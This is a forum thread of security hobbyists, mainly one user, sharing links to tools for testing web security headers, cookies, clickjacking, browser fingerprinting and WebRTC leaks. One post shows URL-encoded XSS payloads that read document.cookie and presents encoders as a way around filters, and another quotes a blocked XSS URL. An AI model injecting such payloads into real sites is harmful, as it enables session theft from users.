 -cdn5.modxcloud.com
 -cdn2.modxcloud.com
 -cdn3.modxcloud.com
 -cdn4.modxcloud.com
 -Segment.io
 -modxcloud.com
-cdn.embedly.com  -cdn.embedly.com
Legend
 Tracker could be tracking safely if this site was secure.
 Tracker does not support secure transmission.

pol
Title: Re: Tests and other Media topics
Post by: polonus on September 05, 2016, 09:42:07 PM
Just went over this session hijacking description info: http://resources.infosecinstitute.com/session-hijacking-cheat-sheet/

Then stumbled upon these bug patterns list: http://resources.infosecinstitute.com/session-hijacking-cheat-sheet/

Time for a web cookies scan: https://webcookies.org/

Testing and extensions: https://www.owasp.org/index.php/Testing_for_cookies_attributes_(OTG-SESS-002)

Bookmarklet: javascript:alert('Cookies stored by this host or domain:\n\n' + document.cookie.replace(/; /g,'\n'));

Oh, but you wanted the results for this forum site, OK? -> https://webcookies.org/cookies/forum.avast.com/2999337

Server vulnerable to OpenSSL CCS attack  :o
Dubious as
Quote
SSL-encrypted websites and servers are still secure. The vulnerabilities that were discovered are in the software itself and not in the Certificate Authorities or SSL/TLS protocols. Once the patches are applied, your systems are secured against the vulnerabilities revealed by the OpenSSL Development team today.
quote info digi cert.

polonus
Title: Re: Tests and other Media topics
Post by: polonus on September 06, 2016, 12:22:02 PM
OCSP stapling decreases the load on a PKI infrastructure's OCSP server by attaching a signed OCSP response to the target in a TLS connection. In addition it creates a more secure/private session since the CA doesn't know that your browser is accessing a given site. Some people have compared this behavior to Kerberos. The Chrome team has decided that they plan to remove CRL and regular OCSP checks, but they haven't disabled OCSP stapling. Other than the client side check: check website here: https://observatory.mozilla.org/analyze.html?host=

Test OCSP stapling in your browser here: http://www.vpnhosting.cz/ocsp/

Most windows type browsers support in. I have it therefore enabled.
Info credits go to Jaromir Kuba.

Have a nice day,

polonus (volunteer website security analyst and website error-hunter)
Title: Re: Tests and other Media topics
Post by: polonus on September 07, 2016, 11:45:43 PM
A comma-test,

The circumvention of DNS and the host file by Microsoft by hard-coding some three dozen IPs in the OS, since XP SP2 and their out of industry standards, is a bad idea for quite a couple of reasons. It is ill or not documented.  So we definitely need the Avast Firewall to mitigate this peaking nose of the camel.

With their kerberos-like authentication validation this makes they can deny whatever user access to their platform and services whenever MS or an restrictive government choose to do so.

Ultimately this could lead to a development of a device platform that offers a user experience of a mix of something between a web TV and an XBox.

Alas Google does likewise. Do the comma test here: http://www.benedelman.org/hardcoding/commatool.html
and read about their hard-coded algorithms: http://www.benedelman.org/hardcoding/

polonus
Title: Re: Tests and other Media topics
Post by: polonus on September 08, 2016, 12:42:17 AM
Technical reasons why hard-coding IPs is a bad idea:
IP addresses should not be hardcoded
squid : S1313
Hardcoding an IP address into source code is a bad idea for several reasons:
a recompile is required if the address changes
it forces the same address to be used in every environment (dev, sys, qa, prod)
it places the responsibility of setting the value to use in production on the shoulders of the developer
Noncompliant Code Example
String ip = "127.0.0.1";
Socket socket = new Socket(ip, 6667);
Compliant Solution
String ip = System.getProperty("myapplication.ip");
Socket socket = new Socket(ip, 6667);  info credits SonarQube.

pol
Title: Re: Tests and other Media topics
Post by: polonus on September 09, 2016, 01:39:01 PM
In the light of all data-breaches recently and the once AOL privacy debacle we show that privacy may not actually exist:
http://www.aolstalker.com see search results and sponsored lisings.
An eye-opener to how little privacy u have,

polonus
Title: Re: Tests and other Media topics
Post by: bob3160 on September 09, 2016, 02:57:45 PM
In the light of all data-breaches recently and the once AOL privacy debacle we show that privacy may not actually exist:
http://www.aolstalker.com (http://www.aolstalker.com) see search results and sponsored lisings.
An eye-opener to how little privacy u have,

polonus
And how long have I been stressing that same point ???
May may think you're hiding but, someone will always find you.
Title: Re: Tests and other Media topics
Post by: polonus on September 09, 2016, 11:09:07 PM
Hi bob3160,

You are right, as the use of the browser or client, as some call it actually, is free only because it is one big tracking and ad-launching machine for big data-vendors (your very private data included). So they want insight into and sell all that you do online, all that you have posted online, you all gave it away when you agreed to that in order to use their free service(s). You have paid with your data.

Do not put/do something online that may one day come to bite you back. And keep at the back of your mind always what I sketched out in the previous alinea. The Internet never forgets and you will never know who may have access to what you have posted.

Forewarned is forearmed.

your avast forum friend,

polonus

Title: Re: Tests and other Media topics
Post by: polonus on September 21, 2016, 05:16:32 PM
To see it in perspective.
What google knows about you
:
What you think according to google- profile: http://www.google.com/settings/ads/
Where you have been according to google - location:  https://maps.google.com/locationhistory
What you searched for: https://www.google.com/history/
All the vids on Utube: https://www.youtube.com/feed/history/search_history
Apps and your google data: https://security.google.com/settings/security/permissions
All your googled meta-data: https://www.google.com/takeout

Hope you stay aware of what they do...

polonus
Title: Re: Tests and other Media topics
Post by: bob3160 on September 21, 2016, 09:49:42 PM
Very interesting and revealing.
Emphasizes the point: Hiding is futile
Title: Re: Tests and other Media topics
Post by: polonus on September 23, 2016, 11:52:15 AM
Has someone hacked in on my private Wifi Network?

Checking the devices shown on your wifi connection, use the small tool from the remarkable Israeli developer, Sofer, Nir:
Wireless Network Watcher, then check the found MAC-addresses here: http://www.coffer.com/mac_find/

Enjoy,

polonus

P.S. Read here why I posted here what I posted: https://forum.avast.com/index.php?topic=191140.msg1339902#msg1339902

Nice proggie to detect rogue DHCP servers on your network: http://www.symantec.com/connect/downloads/detect-rogue-dhcp-servers-network

Damian
Title: Re: Tests and other Media topics
Post by: polonus on September 29, 2016, 12:19:02 AM
CSP Evaluator
Google has come up with a great tool to check on CSP -
Google uses the CSP evaluator for assets including its Cloud Console, Photos, History, and Maps Timeline among others,
and will expand the list.

It resides here: https://csp-evaluator.withgoogle.com/

So I could not refrain from trying it out, as polonus is into volunteer website security on an almost daily basis.

Enjoy, my friends, enjoy!

Checking on this site: http://fetch.scritch.org/%2Bfetch/?url=http%3A%2F%2Fwww.axiscorner.com%2F&useragent=Fetch+useragent&accept_encoding= e.g. -https://plus.google.com/u/1/b/108271385407869247047/+Axiscorner-Architecture-Rendering-Service/about” rel=”publisher

We get two high severity findings: clearcheck
Directive "check" is not a known CSP directive.
expand_more
errorscript-src [missing]
script-src directive is missing.
expand_more
errorobject-src [missing]
Missing object-src allows the injection of plugins which can execute JavaScript. Can you set it to 'none'?
expand_more

Legend

X errorHigh severity finding
errorMedium severity finding
help_outlinePossible high severity finding
removeDirective/value is ignored in this version of CSP
help_outlinePossible medium severity finding
clearSyntax error
info_outlineInformation
checkAll good

Blocked by Netcraft as an XSS attack: Blocked URL: -http://www.domxssscanner.com/scan?url=https%3A%2F%2Fplus.google.com%2Fu%2F1%2Fb%2F108271385407869247047%2F%2BAxiscorner-Architecture-Rendering-Service%2Fabout%22%3EAxis+Corner+Reviews%3C%2Fa%3E+Here%21%3Cscript+type%3D%22application%2Fld%2Bjson%22%3E+%7B++%22%40context%22%3A+%22http%3A%2F%2Fschema.org%2F%22%2C++%22%40type%22%3A+%22Br

Google also released the CSP Mitigator to help administrators apply custom CSP policy to applications and to better understand the impact of enabling CSP including highlighting parts that may break. -> https://chrome.google.com/webstore/detail/csp-mitigator/gijlobangojajlbodabkpjpheeeokhfa

I certainly hope security researchers will benefit from this addition to their toolchest,

polonus (volunteer website security analyst and website error-hunter)
Title: Re: Tests and other Media topics
Post by: polonus on September 29, 2016, 05:58:55 PM
And of course this cannot be established by just one scan.
Read: https://content-security-policy.com/
Also test whether your browser can handle it: https://content-security-policy.com/browser-test/

The observatory project scan may also help you: https://observatory.mozilla.org/

And then we see that even security scan sites may be not be quite secure in these respects, example here:
https://observatory.mozilla.org/analyze.html?host=www.scumware.org

Already presented this, also handy in this repect:  http://cyh.herokuapp.com/cyh

Also nice to have this extension to check a site: https://chrome.google.com/webstore/detail/recx-security-analyser/ljafjhbjenhgcgnikniijchkngljgjda

polonus
Title: Re: Tests and other Media topics
Post by: polonus on October 01, 2016, 01:31:30 PM
Generate your Content Security Policy header with this online generator.
Do it here: http://cspisawesome.com/

And another one for domain: https://report-uri.io/home/generate

polonus

P.S. If you would create some CSP like this
Quote
content="default-src * 'unsafe-inline' 'unsafe-eval'"
,
that would really make your website really very insecure. I trust you would not do a thing like that defining,
so an attacker would have an easy job injecting malcode into your site. (info credits go to StackOverflow's Schlaus)
and this would even be worse allowing everything everywhere:
Quote
default-src *; style-src * 'unsafe-inline'; script-src * 'unsafe-inline' 'unsafe-eval'; img-src * data: 'unsafe-inline'; connect-src * 'unsafe-inline'; frame-src *;
(info credits go to StackOverflow's Amold Roa).

Damian (volunteer website security analyst and website error-hunter)
Title: Re: Tests and other Media topics
Post by: polonus on October 03, 2016, 05:34:17 PM
Website are capable of tracking you onlne even after you have cleansed your browser.

Reasearch two unpatched flaws that can be exploited to track Millions of Internet users, allowing malicious website owners:
List Building: To compile a list of visited domains by users, even if they have cleared their browsing history
Tracking Cookies: To tag users with a tracking cookie that will persist even after they have deleted all cookies
These two Browser Fingerprinting techniques abuse HTTP Strict Transport Security (HSTS) and Content Security Policy – new security features already built into Mozilla Firefox and Google Chrome, and expected to make their ways to other mainstream browsers in near future.
(info credits the Hacker News)  Read example: https://github.com/MicrosoftEdge/static-code-scan/issues/100

Check for yourself: https://zyan.scripts.mit.edu/sniffly/

Polonus found out that the HTTPS Everywhere extension and uMatrix can intervene with Sniffly, but not fully protect against such threats.

Compare scanning here: https://panopticlick.eff.org/

pol
Title: Re: Tests and other Media topics
Post by: polonus on October 03, 2016, 11:40:00 PM
Above we presented CSP, but remember CSP is an security overlayer . We should depend always on other mechanisms like employing frameworks with strict contextual escaping for generating markup, we use the X-frame-options header to protect against clickjacking are asure that resources on secure pages are fetched over HTTPS.

As mentiond one of the three CSP vulnerabilities is clickjacking. Let us check for clickjacking vulnerability here: https://www.lookout.net/test/clickjack.html  and here: http://online.attacker-site.com/html5/ClickjackingTester/

Server request can become blocked by an extension.  Mind that many Chinese ASP websites have clickjacking warnings.
Check also with: https://asafaweb.com/

A warning gives:
Quote
Overview
Websites are at risk of a clickjacking attack when they allow content to be embedded within a frame. An attacker may use this risk to invisibly load the target website into their own site and trick users into clicking on links which they never intended to. An "X-Frame-Options" header should be sent by the server to either deny framing of content, only allow it from the same origin or allow it from a trusted URIs.

Result
It doesn't look like an X-Frame-Options header was returned from the server which means that this website could be at risk of a clickjacking attack. Add a header to explicitly describe the acceptable framing practices (if any) for this site.

polonus
Title: Re: Tests and other Media topics
Post by: polonus on October 06, 2016, 12:19:36 AM
While testing some code inside DOM XSS Scanner evaluated it with jsunpack and got an error
Results from scanning URL: -https://static.xx.fbcdn.net/rsrc.php/v3/y7/r/FEr7rZpxSFw.js

due to undefined is not valid JSON, so the function is working properly. Info Credits: StackOverflow's  Djechlin
(This because JSON does not have a value = NULL).

Kicked up error:
Quote
script
     info: [script] 127.0.0.1/
     info: [decodingLevel=0] found JavaScript
     error: undefined variable JSON
     error: undefined function JSON.stringify
  When you bug-check code, you are bound to find bugs.

polonus
Title: Re: Tests and other Media topics
Post by: bob3160 on October 06, 2016, 12:50:46 AM
I suggest you get a can of Raid to help solve your bug problem. :)

(http://screencast-o-matic.com/screenshots/u/Lh/1475707830987-77743.png)
Title: Re: Tests and other Media topics
Post by: polonus on October 23, 2016, 12:36:38 PM
Did any part of your home network became part of a IoT bot network?
No of course not, you may say, because I have the Home Network Protection module  on my Avast AV Solution enabled!  ;) ;D
So you are more secure than others. OK. Good start. Then now for all the others.

A free scanner here to make out if you are known at Shodan's public iOT scanner:
http://iotscanner.bullguard.com/

You could also check for dorks (often used and abused by these hackers):
https://sourceforge.net/directory/os:windows/?q=google%20dork%20scanner

Do you make use of any of those 62 terribly insecure default passwords?
As always starting with the admin - admin combination or admin - password for that matter?

Read: https://www.malwaretech.com/2016/10/mapping-mirai-a-botnet-case-study.html

Do you have user enumeration settings enabled so they can scan for just such a combination like "polonus - admin" for instance.
I would not dream of using that, but just to give an example it is there....

Also have I seen the rise of this check "have i been pnewed"- https://haveibeenpwned.com/
Or you may decide not to use it as these your data haven't been shared anywhere before. That is up to you.
Know curiosity killed the poor proverbial animal..... :D

Enjoy, my good avast friends, enjoy.

polonus
Title: Re: Tests and other Media topics
Post by: polonus on November 06, 2016, 02:19:40 PM
Dear avast friends,

I am working on my F-Bufferbloat Status mitigation, and probably it is my chain of routing config that builds this up
or rather problems with my ISP, who had connection problems lately, and sent me an e-mail.
Some have to update their router firmware to get b etter scores.

Wanna test your Bufferbloat Score here? Go to: https://www.dslreports.com/speedtest (check according to your situation).

How is avast av interfering to further increase bufferbloat.  Some experience high latency problems of several hundred ms.
Bufferbloat testing then comes disabled. Mine worked second time around.
Do you have different readings on different browsers or for different devices.

You can also test with this software from Google github, download and open in any browser:
https://google.github.io/latency-benchmark/

An online latency test: http://freeola.com/line-test/#start
Ideally the jitter should always read: 0

Enjoy,

polonus
Title: Re: Tests and other Media topics
Post by: polonus on November 23, 2016, 04:23:07 PM
Do the privacy DSN test here: https://getdnsapi.net/query.html
My private IP query returned: Response code was: GOOD. Status was: Queries for the name yielded all negative responses

Check yours as well, while the surveillance grabbing may go on in your cloud data,
it is important to know what goes along behind our backs.

polonus
Title: Re: Tests and other Media topics
Post by: polonus on November 25, 2016, 11:11:14 PM
Mirai scam scanners: https://scanme.iotdef.com/
and https://www.incapsula.com/mirai-scanner/

No scareware or are you just not vulnerable?

polonus
Title: Re: Tests and other Media topics
Post by: polonus on November 26, 2016, 01:30:29 AM
Nice decoding tools to use to protect better on the Big Bad Net: https://paulschou.com/tools/xlate/
so fooling the filters and make da XSS won't work...

Another online one for connoisseurs: http://encoders-decoders.online-domain-tools.com/

Example
Quote
/?%22%3e%3c%73%63%72%69%70%74%3e%64%6f%63%75%6d
%65%6e%74%2e%63%6f%6f%6b%69%65%3c%2f%73%63%72%69%70%74%3e
[example 2] [host]/?%27%3e%3c%73%63%72%69%70%74%3e%64%6f%63%75%6d%65%6e
%74%2e%63%6f%6f%6b%69%65%3c%2f%73%63%72%69%70%74%3e
which is being decoded here
as URL output
Quote
/?"><script>docum
ent.cookie</script>
[example 2] [host]/?'><script>documen
t.cookie</script>
Try it here: http://coderstoolbox.net/string/#!encoding=url&action=decode&charset=us_ascii

enjoy, my good friends, enjoy,

polonus
Title: Re: Tests and other Media topics
Post by: polonus on December 01, 2016, 09:07:14 PM
Check your google account for Gooligan: https://gooligan.checkpoint.com/

polonus
Title: Re: Tests and other Media topics
Post by: bob3160 on December 01, 2016, 09:44:38 PM
Check your google account for Gooligan: https://gooligan.checkpoint.com/ (https://gooligan.checkpoint.com/)

polonus
Once done, will Zonealarm add you to their list of prospective customers ???
Title: Re: Tests and other Media topics
Post by: DavidR on December 01, 2016, 10:35:21 PM
Check your google account for Gooligan: https://gooligan.checkpoint.com/ (https://gooligan.checkpoint.com/)

polonus
Once done, will Zonealarm add you to their list of prospective customers ???

I don't like using these checkers as I'm really trusting NOT. But I gave this a go and if failed to get of the starting blocks. Clicking the Check button fails to do anything.
Title: Re: Tests and other Media topics
Post by: bob3160 on December 01, 2016, 10:40:11 PM
Check your google account for Gooligan: https://gooligan.checkpoint.com/ (https://gooligan.checkpoint.com/)

polonus
Once done, will Zonealarm add you to their list of prospective customers ???

I don't like using these checkers as I'm really trusting NOT. But I gave this a go and if failed to get of the starting blocks. Clicking the Check button fails to do anything.
That means you have something blocking it. I tried it on a throw away and it worked. :)
Title: Re: Tests and other Media topics
Post by: DavidR on December 02, 2016, 12:17:16 AM
Check your google account for Gooligan: https://gooligan.checkpoint.com/ (https://gooligan.checkpoint.com/)

polonus
Once done, will Zonealarm add you to their list of prospective customers ???

I don't like using these checkers as I'm really trusting NOT. But I gave this a go and if failed to get of the starting blocks. Clicking the Check button fails to do anything.
That means you have something blocking it. I tried it on a throw away and it worked. :)

I do have firefox tied down pretty well with NoScript, RequestPolicy and ABP add-ons, but I did try to allow areas/sites it accessed, without giving it blanket authority.
Title: Re: Tests and other Media topics
Post by: polonus on December 02, 2016, 02:45:50 PM
But the issues still remain: http://www.securityweek.com/gooligan-android-malware-compromises-more-1-million-google-accounts

What is there left we can realy, realy trust?

With a world so full of uneliable information and outright deceit, I sometimes even worry
whether  I can trust the info I spread myself.

I hope I can and always try to be a truthful person in every respect.

Sometimes we are purposefully being fed desinformation or lied to or misled even brainwashed
by those that wanna profit from us big time.

What about the ordinairy end-user without much technical insight.
You can tell them anything to believe, and they still would be going around in the dark.

You apparently cannot trust all the apps from GooglePlay,
and Google has a hard time throwing out  all those that try to abuse their services.

polonus
Title: Re: Tests and other Media topics
Post by: polonus on December 02, 2016, 11:54:35 PM
Never go against the "same origin policy" or disable it inside the client (CORS disabled).
Only developers on very specific occasions may do so. As a general rule it is mighty unsafe.

See an example of secure frame cross domain communication here: http://sandbox.ternarylabs.com/porthole/
The code resides here: https://ternarylabs.github.io/porthole/

polonus
Title: Re: Tests and other Media topics
Post by: polonus on December 04, 2016, 06:47:10 PM
Some links here. One for request validation: http://web-sniffer.net/

Then in the struggle ahgainst spam mails,
it is important websites have a so-called spf aka Sender Policy Framework record.

The testing tools: http://www.kitterman.com/spf/validate.html

Scan whether they have one: http://www.kitterman.com/getspf2.py
or generate one at http://www.spfwizard.net/  or here: https://www.dynu.com/en-US/NetworkTools/SPFGenerator

Also helpful in the battle against spoofing is the CSR decoder: https://www.sslshopper.com/csr-decoder.html
and see the other tools at that page.

enjoy my good friends, enjoy,

polonus (volunteer website security analyst and website error-hunter)
Title: Re: Tests and other Media topics
Post by: polonus on December 05, 2016, 12:55:21 AM
Real method to come to a free second-op scan or too good to be true?

Read: http://www.infoworld.com/article/3014323/security/a-free-almost-foolproof-way-to-check-for-malware.html#tk.ifw-infsb

Anyone to react?

polonus

P.S. Can imagine a couple of situation where this won't work, as for instance with malware like visbot that lies dormant as to the moment you start to perform certain specific actions in the browser. In such and other plausible situations it is better to have real AV like avast, folks.

Damian
Title: Re: Tests and other Media topics
Post by: polonus on December 06, 2016, 01:43:09 PM
Nice read for those into javascript malware analysis.

Where a bit of coee, hidden as Latin terms, could produce a very dangerous javascript malware: http://www.schillmania.com/content/entries/2009/javascript-malware-obfuscation-analysis/
 (go down to where it reads "Holy Crap, This Thing Is Bad (Or, "Latin Lingo")".. and then read on:).  link article author = Schill.

A more general introduction: https://heimdalsecurity.com/blog/javascript-malware-explained/  (Andra Zaharia).

polonus
Title: Re: Tests and other Media topics
Post by: polonus on December 10, 2016, 01:30:15 PM
You find the following three privacy settings listed under the main settings tab in the uBlock Origin options (which you access with a right-click on the icon and the selection of options). Go to uBlock0 Dashboard.

Disable pre-fetching (to prevent any connection for blocked network requests).
Disable hyperlink auditing/beacon.
Prevent WebRTC from leaking local IP address  (standard setting is not set by deafult)
The new setting provides you with a toggle to enable or disable WebRTC from leaking your local IP address.

Test here: https://diafygi.github.io/webrtc-ips/   STUN Servers won't log you anymore.

polonus (volunteer website security analyst and website error-hunter)
Title: Re: Tests and other Media topics
Post by: polonus on December 10, 2016, 01:51:42 PM
A stun server list: https://gist.github.com/zziuni/3741933
see: https://sourceforge.net/projects/stun/

pol
Title: Re: Tests and other Media topics
Post by: bob3160 on December 12, 2016, 02:12:05 PM
(http://screencast-o-matic.com/screenshots/u/Lh/1481548183891-69930.png)
https://www.reverse.it/
Another tool that might come in handy. :)
Title: Re: Tests and other Media topics
Post by: polonus on December 12, 2016, 02:16:32 PM
Hi bob3160,

Thanks for the link.

polonus
Title: Re: Tests and other Media topics
Post by: bob3160 on December 12, 2016, 02:30:03 PM
Hi bob3160,

Thanks for the link.

polonus
You're welcome. Let me know if you get anything out of this one that you don't already get from your arsenal. :)
Title: Re: Tests and other Media topics
Post by: Pondus on December 12, 2016, 03:04:11 PM
Bob / Polonus it is the same as this > https://www.hybrid-analysis.com/

https://www.payload-security.com/

Title: Re: Tests and other Media topics
Post by: Para-Noid on December 12, 2016, 05:48:18 PM
Bob / Polonus it is the same as this > https://www.hybrid-analysis.com/

https://www.payload-security.com/

I'm neither Bob nor polonus, but as far as I can tell...yes.
Title: Re: Tests and other Media topics
Post by: Para-Noid on December 12, 2016, 05:57:36 PM
https://www.leakedsource.com/main/notify/

Found this recently and thought it worthy to share. If your web account (Google, Yahoo, MSN, etc) has been compromised you will get an email notification.
Title: Re: Tests and other Media topics
Post by: polonus on December 12, 2016, 06:00:13 PM
Thanks to Para-Noid for answering Pondus,

and now to something completely different, your browser leaking....

Testing for browser leaks to STUN Servers - WebRTC or via WebGL, here are best sites to test:
https://vpnreviewer.com/best-sites-check-ip-leaks-2016

enjoy,

polonus

P.S. @ Para-Noid,
        If you fill that address out there, is not at the same time these info being harvested for ?????????.
       Something deep inside says me, that they do not run these services just because they have blue eyes
        or they are benefactors.... ;D
Title: Re: Tests and other Media topics
Post by: Para-Noid on December 12, 2016, 06:43:23 PM

P.S. @ Para-Noid,
        If you fill that address out there, is not at the same time these info being harvested for ?????????.
       Something deep inside says me, that they do not run these services just because they have blue eyes
        or they are benefactors.... ;D

I seriously doubt it. LeakedSource is well known for investigating data breaches.
I found the link while reading http://www.zdnet.com/article/dailymotion-hack-exposes-millions-of-accounts/

https://www.leakedsource.com/api/   https://www.leakedsource.com/api/documentation/
https://www.leakedsource.com/main/databaselist/   https://www.leakedsource.com/blog/
Title: Re: Tests and other Media topics
Post by: digmor crusher on December 12, 2016, 08:38:12 PM
Thanks to Para-Noid for answering Pondus,

and now to something completely different, your browser leaking....

Testing for browser leaks to STUN Servers - WebRTC or via WebGL, here are best sites to test:
https://vpnreviewer.com/best-sites-check-ip-leaks-2016

enjoy,

polonus

P.S. @ Para-Noid,
        If you fill that address out there, is not at the same time these info being harvested for ?????????.
       Something deep inside says me, that they do not run these services just because they have blue eyes
        or they are benefactors.... ;D


After reading this I tried a Chrome extension called WebRTC Leak Prevent, it worked to stop any RTC leaks in Chrome according to the doileak.com website.
Title: Re: Tests and other Media topics
Post by: polonus on December 12, 2016, 10:03:23 PM
Why not have the pair WebRTC Leak Prevent and Disable WebGL.

polonus
Title: Re: Tests and other Media topics
Post by: polonus on December 21, 2016, 11:04:43 PM
Google is developing software to test crypto:
https://github.com/google/wycheproof

For websites I always look at: https://cryptoreport.websecurity.symantec.com/checker/views/certCheck.jsp
For DROWn I look at one of these results: https://observatory.mozilla.org/
as this scan that once was here won't function: https://drownattack.com/ (taken off apparently).
so use this one: https://pentest-tools.com/network-vulnerability-scanning/drown-ssl-scanner

polonus
Title: Re: Tests and other Media topics
Post by: bob3160 on December 22, 2016, 04:55:33 PM
Google is developing software to test crypto:
https://github.com/google/wycheproof (https://github.com/google/wycheproof)

For websites I always look at: https://cryptoreport.websecurity.symantec.com/checker/views/certCheck.jsp (https://cryptoreport.websecurity.symantec.com/checker/views/certCheck.jsp)
For DROWn I look at one of these results: https://observatory.mozilla.org/ (https://observatory.mozilla.org/)
as this scan that once was here won't function: https://drownattack.com/ (https://drownattack.com/) (taken off apparently).
so use this one: https://pentest-tools.com/network-vulnerability-scanning/drown-ssl-scanner (https://pentest-tools.com/network-vulnerability-scanning/drown-ssl-scanner)

polonus
https://forum.avast.com/index.php?topic=19387.msg1355691#msg1355691
Title: Re: Tests and other Media topics
Post by: polonus on December 22, 2016, 05:45:55 PM
Thanks, bob3160, for reacting.

Have a Great Christmas ye all and stay cyber-secure!
-> https://www.youtube.com/watch?v=LNvejfhF958

Damian
Title: Re: Tests and other Media topics
Post by: polonus on December 29, 2016, 12:32:10 AM
When you run your own flaw of dhcp daemon on your windows home network, you certainly wanna know it is no sniff,
so test it here: http://files.thecybershadow.net/dhcptest/  (allowed for private and personal networks only).
Re: https://github.com/CyberShadow/dhcptest
I used Vladimir Pantileev's windows version: http://blog.thecybershadow.net/2013/01/10/dhcp-test-client/
v0.5 with a Win64 build: http://files.thecybershadow.net/dhcptest/dhcptest-0.5-win64.exe

enjoy,

polonus
Title: Re: Tests and other Media topics
Post by: polonus on January 01, 2017, 01:55:47 AM
Firefox will get protection against font fingerprinting.

When you do not have java and silverlight plug-ins installed, you should not be too overtly afraid about uniquely being followed
via font fingerprinting.

Userts of Linux could use fluxfont: https://github.com/da2x/fluxfonts

Font fingerprinting seems obsolete, read: https://browserleaks.com/fonts
When testing I get all question marks for my browser

JS Fonts (unicode)
Fingerprint   ?
Report   ?
JS Fonts (classic)
Fingerprint   ?
Report   ?
Flash Fonts
Fingerprint   ?
Report   ?

Canvas fingerprinting I blocked via a specific extension for that.

But there are some other issues to worry about: https://amiunique.org/faq

Do not use a browser when you do not want to be traced. To-day the formula is as simple as that.

Privacy = no Internet....period.

Do you not believe us, test it out here: https://amiunique.org/fp

Another issue to get worried about in 2017 when you live inside the EU.
Read it as I am probably still allowed to use a link: https://juliareda.eu/2016/12/10-illegal-things/
Just ponder about the implecations of this not for big corporations but just for you and me,
the average user of the Interwebs.  (see attached image)

polonus
Title: Re: Tests and other Media topics
Post by: polonus on January 10, 2017, 03:55:54 PM
NoScript alerts for javascript in tor browser and  why third party tracking blocking makes browsing faster.

Here we have an alert cause by script from this tag link's javascript: -http://tags.bkrtx.com/js/bk-coretag.js
helped here: http://www.domxssscanner.com/scan?url=https%3A%2F%2Fd1z2jf7jlzjs58.cloudfront.net%2Fp.js
for this vid link: -http://www.infoworld.com/article/2612716/hacking/video--how-to-hack-php-sites-with-sql-injection.html
opened with tor browser.

Consider: SRI rapport: https://sritest.io/#report/5f5cd7c1-40fb-4fe3-be12-735ab291c089
Insecure tracking from:
-www.googletagmanager.com
-p.typekit.net
- comScore
-jsonip.com
-shaaaaaaaaaaaaa.com
-www.infoworld.com
-fonts.staticworld.net
-a.postrelease.com
- t.zqtk.net
-i-dge.staticworld.net
-core0.staticworld.net
-tags.bkrtx.com BlueKai
- core3.staticworld.net
-trends.revcontent.com
- Parse.ly
- ak.sail-horizon.com
- pixel.staticworld.net

See: http://www.domxssscanner.com/scan?url=https%3A%2F%2Fd1z2jf7jlzjs58.cloudfront.net%2Fp.js
and producing errors here: http://www.domxssscanner.com/scan?url=http%3A%2F%2Ftags.bkrtx.com%2Fjs%2Fbk-coretag.js  hosted via -a104-95-76-57.deploy.static.akamaitechnologies.com

This is due to BlueKai tracking, which produced an issue with ABP as it was very hard to block for ad-blockers.

These scripts come best blocked by  https://github.com/mozilla/blok
tor development should give this software a look....

The results of the tracking reprort:
url   scheme   host   path   type   query   aid   cid   date   patterns   objects   name   affilition
-http://tags.bkrtx.com/js/bk-coretag.js   -http   tags.bkrtx.com   /js/bk-coretag.js   tracker      116   31   2017-01-10 15:47:48   (stags|tags)\.bluekai\.com   -http://tags.bluekai.com   BlueKai   
-http://tags.bkrtx.com/js/bk-coretag.js   -http   tags.bkrtx.com   /js/bk-coretag.js   tracker      116   31   2017-01-10 15:47:48   bkrtx\.com\/js\/   -http://tags.bkrtx.com/js/bk-coretag.js   BlueKai   
-http://tags.bkrtx.com/js/bk-coretag.js   -http   tags.bkrtx.com   /js/bk-coretag.js   tracker      116   31   2017-01-10 15:47:48   bluekai\.com   -http://tags.bluekai.com   BlueKai   

The reach of trackers to over 21 million pages of 350,000 unique sites, so if you turn up security slider in tor-browser for this code that you'd block anyway, your browsing gets faster and you won't miss anything out.
Such tracking code could also lead to unwanted pop-ups and browser hijacker objects you'd rather like to be without.

For background reading: http://www2016.net/proceedings/proceedings/p121.pdf  (source: cliqz)

And where tracking protection created problems for firefox, especially with facebook tracking (yes facebook is a mass media tracking device) : https://bugzilla.mozilla.org/showdependencytree.cgi?id=1101005&hide_resolved=1

polonus (volunteer website security analyst and website error-hunter)
Title: Re: Tests and other Media topics
Post by: polonus on January 10, 2017, 06:54:02 PM
But be aware, my good friends, insecurity lures everywhere and could be around every corner: http://retire.insecurity.today/#!/scan/e5f3453ae57ebde51a9a0be770075324c12ec4c4820a87f55f8a1207da9c529d
and universal XSS threat for https://www.htbridge.com/websec/?id=c0eb5653d7c5b0277ef5a899beee70c79186df4e90c91de738ac9ca4e77e11e2
Not safe internal CRM website -https://gillii.torproject.org/  ( imagine with authstealer.js?).
Re: http://toolbar.netcraft.com/site_report?url=https://gillii.torproject.org

pol
Title: Re: Tests and other Media topics
Post by: polonus on January 23, 2017, 02:55:07 PM
Did you check your Content Security Policy? at https://csp-evaluator.withgoogle.com/
Even the most secure sites may have some weaknesses.
Let us look at the settings for https://observatory.mozilla.org/
Like here:
Quote
default-src 'none';
connect-src https://api.ssllabs.com https://hstspreload.org https://http-observatory.security.mozilla.org https://securityheaders.io https://tls.imirhil.fr https://tls-observatory.services.mozilla.com https://www.htbridge.com;
font-src 'self' https://fonts.gstatic.com;
frame-ancestors 'none';
img-src 'self';
script-src 'self';
style-src 'self' https://fonts.googleapis.com
Quote
content-security-policy

default-src 'none'; connect-src https://api.ssllabs.com https://hstspreload.org https://http-observatory.security.mozilla.org https://securityheaders.io https://tls.imirhil.fr https://tls-observatory.services.mozilla.com https://www.htbridge.com; font-src 'self' https://fonts.gstatic.com; frame-ancestors 'none'; img-src 'self'; script-src 'self'; style-src 'self' https://fonts.googleapis.com, upgrade-insecure-requests; block-all-mixed-content

Possible medium security issue:
Quote
checkimg-src
expand_more
help_outlinescript-src
expand_more
help_outline'self'
'self' can be problematic if you host JSONP, Angular or user uploaded files.

checkstyle-src

Help Icon
Click the icons in the tables below for a more detailed explanation.

HTTP security headers

Name

Value

Setting secure

content-security-policy

Cache-control header not returend..
Page meta security headers not set securely.  Form autocomplete-settings: scantron-form HTML form not secure.

polonus (volunteer website security analyst and website error-hunter)
Title: Re: Tests and other Media topics
Post by: polonus on January 27, 2017, 03:36:04 PM
Some more sites to check (blocked) IP: https://www.threatminer.org/host.php?q=
And see SSL Server Security Tests at work in real time: https://www.htbridge.com/ssl/

polonus
Title: Re: Tests and other Media topics
Post by: polonus on February 02, 2017, 09:58:38 PM
It could be interesting to establish what kind of security layers have been implemented for a specific website.

This apart from how the confidentiality of a site has been guaranteed, HTTPS has been implemeted correctly.
